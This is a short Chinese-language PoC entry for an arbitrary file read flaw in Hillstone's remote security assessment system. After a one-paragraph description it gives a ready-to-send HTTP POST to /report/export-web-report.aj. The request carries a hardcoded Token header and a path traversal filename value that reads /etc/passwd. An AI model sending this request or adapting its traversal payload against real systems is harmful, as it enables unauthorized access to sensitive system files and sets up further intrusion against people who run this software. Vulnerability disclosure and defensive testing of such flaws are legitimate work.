山石网科远程安全评估系统文件读取漏洞

2026-07-29 16:09:15 山石网科远程安全评估系统 PoC Public

Description

山石网科远程安全评估系统存在任意文件读取漏洞。该系统对用户输入的文件路径参数缺乏严格的权限校验与过滤,远程攻击者可通过构造恶意路径请求,绕过认证读取系统敏感文件,导致系统敏感信息泄露,为后续攻击提供数据支撑。

PoC

POST /report/export-web-report.aj HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Token: 18249c5f2074ce8e1ce60e8ab9bc1e6916cb5d9ab7aec77958f685b156b07726

filename=../../../../../../../../../../etc/passwd&name=test.txt

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References